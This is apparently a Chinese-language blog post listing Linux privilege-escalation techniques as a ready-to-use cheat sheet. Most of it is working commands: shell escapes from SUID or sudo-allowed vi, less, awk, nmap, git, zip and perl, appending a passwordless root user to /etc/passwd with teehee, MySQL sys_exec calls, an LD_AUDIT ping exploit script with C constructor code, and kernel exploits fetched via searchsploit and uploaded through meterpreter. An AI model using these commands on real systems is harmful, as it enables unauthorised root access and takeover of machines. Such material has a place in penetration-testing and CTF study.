Linux提权的N个方法
echo命令提权echo os.system('/bin/sh')直接将普通用户提权至root用户mysql数据库提权select sys_exec("usermod -aG admin 用户ID");nmap提权漏洞5.0一下进入nmap交互模式!sh提权即可zip提权
不会真有人用这么多提权方法都不能提权吧
teehee提权
将john写入root用户组里
echo "john::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
mysql数据库提权
要被分配root权限 ,查看命令find / -perm -u=s -type f 2>/dev/null
select sys_exec("usermod -aG admin 用户ID");
原理admin用户组具备root权限,通过mysql数据库将当前用户加入至具有root权限的用户组
vi提权
要被分配root权限 ,查看命令find / -perm -u=s -type f 2>/dev/null
vi
然后进入esc就是退出时要输入wq1那里
:!/bin/bash
vi命令需要具有root权限
nmap提权
要被分配root权限 ,查看命令find / -perm -u=s -type f 2>/dev/null
版本5.0一下
*进入nmap交互模式 *
nmap --interactive
!sh提权即可
zip提权
要被分配root权限 ,查看命令find / -perm -u=s -type f 2>/dev/null
核心sudo没有该命令失效
touch exploit
sudo -u root zip exploit.zip exploit -T -unzip-command="sh -c /bin/bash"
脚本ping提权
核心ping和gcc没有则无法实现
vi 2.sh
unset LD_AUDIT
rm -r -f /tmp/exploit
mkdir /tmp/exploit
ln /bin/ping /tmp/exploit/target
exec 3< /tmp/exploit/target
ls -l /proc/$$/fd/3
rm -rf /tmp/exploit
ls -l /proc/$$/fd/3
cat > program.c << _EOF
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
_EOF
gcc -w -fPIC -shared -o /tmp/exploit program.c
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
unset LD_AUDIT
chmod 777 2.sh
./2.sh
bash提权
要被分配root权限 ,查看命令find / -perm -u=s -type f 2>/dev/null
bash -p
awk提权
要被分配root权限 ,查看命令find / -perm -u=s -type f 2>/dev/null
awk 'BEGIN {system("/bin/sh")}'
sudo提权
因为可能有设定不需要密码就可以执行sudo的操作(来源:敲代码的时候怕麻烦设置的TVT懂得都懂)
sudo perl -e "exec '/bin/sh' "
bash -i
less提权
要被分配root权限 ,查看命令find / -perm -u=s -type f 2>/dev/null
less /etc/passwd
!/bin/sh
寻找高权限用户提权
拿到shell后进入开始寻找
cat /etc/passwd (查看是否存在高权限用户)
cd /home (进入高级用户目录查看文件)
(进入其他用户目录,查看文件寻找密码,一般来说都可以通过历史History,wordpass)
然后登录sudo 用户名
screen提权
步骤和其他服务(exim4,apache,linux内核…)查询一样的都是searchsploit加服务然后上传运行
searchsploit screen 版本号
cat *.sh
一般来说这些sh文件都要拆分出来用,会吧会拆分吧{}
mysql数据库提权2
(漏洞来源:新建用户时喜欢把一些用户提权至root权限然后还把密码设置和root用户一样的,导致可以通过mysql查看用户密码并且拿去提权)
进入数据库
use deneme;
show tables;
select * from user; (查看用户信息即密码,并尝试通过其密码进行登录root。)
(注:不同版本命令不一样如果有加密的拿去解密,别和我说你不会解密QAQ)
shell提权
通过查看操作系统内核版本找到对应的C文件(算了当你们不会)
searchsploit Linux Kernel ?.?.?
gcc ?.c -o shell
应该会上传文件吧(算了当你们不会)
下面这东西都知道吧,提权进入的界面
meterpteter > upload /root/shell
meterpteter > chmod 777 shell
git提权
要被分配root权限 ,查看命令find / -perm -u=s -type f 2>/dev/null
sudo git help add
sudo git help config
sudo git -p help
三选一
!/bin/bash
vi提权
要被分配root权限 ,查看命令find / -perm -u=s -type f 2>/dev/null
sudo /usr/bin/vi /tmp/jin
morpheus提权
要被分配root权限 ,查看命令find / -perm -u=s -type f 2>/dev/null
morpheus 'BEGIN {system("/bin/sh")}'
更多推荐
10
0- 0
已为社区贡献1条内容
所有评论(0)